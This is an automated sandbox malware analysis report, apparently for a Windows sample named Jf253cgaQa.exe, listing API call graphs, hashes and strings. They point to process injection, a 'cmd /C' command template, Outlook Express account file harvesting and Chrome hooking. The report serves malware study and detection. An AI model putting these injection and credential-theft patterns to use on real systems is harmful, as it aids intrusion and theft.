  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:AD7B9C14083B52BC532FBA5948342B98
Total matches:133
Initial Analysis Report:Open
Initial sample Analysis ID:56191
Initial sample SHA 256:2E3314E18462E1F0BB2C45D2DBECEF96FD049065BF74CD54261CE72B15FE4F13
Initial sample name:Jf253cgaQa.exe

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
